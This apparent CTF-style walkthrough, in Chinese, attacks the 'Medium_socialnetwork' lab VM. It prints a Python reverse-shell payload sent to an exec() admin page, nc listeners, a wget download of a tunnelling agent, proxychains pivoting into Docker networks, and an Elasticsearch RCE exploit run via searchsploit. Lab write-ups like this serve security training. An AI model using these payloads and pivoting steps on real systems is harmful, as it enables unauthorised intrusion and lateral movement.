IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> 打靶第一周-Medium_socialnetwork -> 正文阅读

[开发工具]打靶第一周-Medium_socialnetwork

靶机地址

Medium_socialnetwork

攻击手段

主机发现
端口扫描
服务发现
路径爬取
代码注入
Shell脚本
内网信息收集
内网穿透
漏洞利用
密码破解
本地提权
攻击代码修改

使用工具

nmap 主机发现
dirsearch 目录扫描
nc 端口侦听
venom 内网穿透
proxychains 代理
searchsploit exp查找

开始攻击

  1. 首先ifconfig查看自己ip
    在这里插入图片描述

  2. 扫描网段,发现目标主机。nmap 10.155.211.0/24。可看到开启了22,5000端口。
    在这里插入图片描述

  3. 扫描端口,查看服务。nmap 10.155.211.171 -p22,5000 -sV
    在这里插入图片描述
    访问目标
    在这里插入图片描述

  4. 只有一个输入框,测试xss
    在这里插入图片描述
    可以看到被编码了

  5. 换方向,尝试爆破路径。使用dirsearch
    在这里插入图片描述

  6. 访问http://192.168.168.12:5000/admin
    在这里插入图片描述
    可知所有代码将交给exec()函数执行,且前期发现系统中存在python环境
    可提交反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

参考:反弹shell的几种方式总结
先不提交

在这里插入图片描述

  1. 在kali使用nc启动侦听。nc -nvlp 4444得到shell
    在这里插入图片描述
  2. 看到dockerfile文件,怀疑为docker容器。判断容器

使用ls /.dockerenv查看是否存在dockerenv文件。
使用cat /proc/1/cgroup查看

  1. 查看内网主机,用ping命令扫描内网其他主机
    在这里插入图片描述
    是16位网段,所以需要扫65535个ip。使用for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done命令。(尝试扫描c段for i in $(seq 1 255);for s in $(seq 1 255); do ping -c 1 172.17.$i.$s; done但会报错)原因
    for a in`seq $num`
    在这里插入图片描述
    可看到172.17.0.2;172.17.0.3回包了

  2. 直接访问是不同的,需要使用内网穿透。使用venom工具,建立隧道。
    venom
    下载解压后选择合适的客户端。这里我们选择agent_linux_x64模块可看到有agent模块和admin模块
    在这里插入图片描述
    启用./admin_linux_x64 -lport 9999侦听9999端口
    在这里插入图片描述
    然后将agent_linux_x64传到目标机去。
    我们使用python开启一个http服务。(注意要在所传文件的当前目录创建服务)
    在这里插入图片描述
    然后用目标机访问服务,并下载agent_linux_x64

wget http://192.168.168.13/agent_linux_x64

在这里插入图片描述
之后给与权限

chmod +x agent_linux_x64

在这里插入图片描述
建立隧道

./agent_linux_x64 -rhost 192.168.168.13 -rport 9999

在这里插入图片描述
在这里插入图片描述

  1. 使用venom。
    show命令查看
    goto 1节点
    使用socks 1080,侦听1080端口
    这样在kali上就启动了一个侦听1080端口上的socks代理。
    在这里插入图片描述
  2. 为了让kali的攻击工具就可以通过挂代理访问内网网段。使用proxychain。由第(9)步知内网中有172.17.0.2;172.17.0.3两台机器。
    修改proxychain的配置文件vi /etc/proxychains4.conf在最后参照(11)修改代理类型为socks5 端口改为1080
    在这里插入图片描述
  3. 对内网机器扫描。
    proxychains nmap -Pn -sT 172.17.0.1
    在这里插入图片描述
    可看到开启了22,5000端口。使用proxychains nmap -p22,5000 -Pn -sT -sV 172.17.0.1详细扫描
    在这里插入图片描述
    由此确定172.17.0.1是192.168.168.12的内网 ip。也可尝试使用浏览器访问(需配置代理)
    在这里插入图片描述之后可看到192.168.168.12:5000的网页与172.17.0.1:5000相同。

扫172.17.0.2
proxychains nmap -Pn -sT 172.17.0.2,发现开放了9200端口
在这里插入图片描述
扫服务proxychains nmap -p9200 -Pn -sT -sV 172.17.0.2发现是Elasticsearch应用
在这里插入图片描述

  1. 搜索漏洞。使用searchsploit Elasticsearch搜索漏洞exp
    在这里插入图片描述第一第二个为rce利用脚本可以挨个尝试。

  2. 使用exp。proxychains python2 36337.py 172.17.0.2
    在这里插入图片描述getshell了。
    但发现无法运行是因为Elasticsearch中需要先有数据才能被攻击。
    https://github.com/YrenWu/Elhackstic
    proxychains curl -XPOST ' http://172.17.0.2:9200/twitter/user/yren ' -d ' { "name" : "deng" } '
    在执行exp不报错。

  3. 执行ls命令,发现有一个有趣的东西,密码文件。解密后发现使用john账户可登录

在第15步时,我提交了数据仍然报错,暂时不做了。后续做了在更。

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-13 09:28:08  更:2021-09-13 09:30:24 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 5:24:04-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码